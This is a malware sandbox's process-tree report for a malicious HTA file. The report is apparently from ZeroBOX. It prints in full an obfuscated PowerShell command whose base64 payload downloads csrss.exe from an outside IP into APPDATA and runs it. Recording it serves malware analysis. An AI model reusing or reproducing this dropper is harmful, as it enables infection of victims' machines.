| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\hhu.hta.html
3068
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3068 CREDAT:145409
  1780
  - cmd.exe "C:\Windows\system32\cmd.exe" "/C poweRsHELL.exe -ex Bypass -nop -W 1 -c DEVIcecrEDEntIAlDEpLOYmeNt ; IEx($(IEx('[SySTEM.teXt.EncOdING]'+[ChAR]58+[char]0x3A+'UTf8.geTSTrInG([systEM.coNVerT]'+[ChaR]58+[CHaR]58+'FROmbASE64StRIng('+[cHaR]0x22+'JHJSMiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CRXJEZWZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbGdRbXNieSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR1FIQ0FURkhOVEEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdBcix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjeUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaHROb1lBTENQdmsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkclIyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjE4LzcwMS9jc3Jzcy5leGUiLCIkRU5WOkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3NUQXJULXNMZUVQKDMpO2luVm9rRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[CHaR]0x22+'))')))"
    1720
    - powershell.exe poweRsHELL.exe -ex Bypass -nop -W 1 -c DEVIcecrEDEntIAlDEpLOYmeNt ; IEx($(IEx('[SySTEM.teXt.EncOdING]'+[ChAR]58+[char]0x3A+'UTf8.geTSTrInG([systEM.coNVerT]'+[ChaR]58+[CHaR]58+'FROmbASE64StRIng('+[cHaR]0x22+'JHJSMiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CRXJEZWZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbGdRbXNieSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR1FIQ0FURkhOVEEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdBcix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjeUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaHROb1lBTENQdmsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkclIyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjE4LzcwMS9jc3Jzcy5leGUiLCIkRU5WOkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3NUQXJULXNMZUVQKDMpO2luVm9rRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[CHaR]0x22+'))')))"
      2520
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\_twcsxgn.cmdline"
        1184
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES4751.tmp" "c:\Users\test22\AppData\Local\Temp\CSC46C3.tmp"
        2240

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents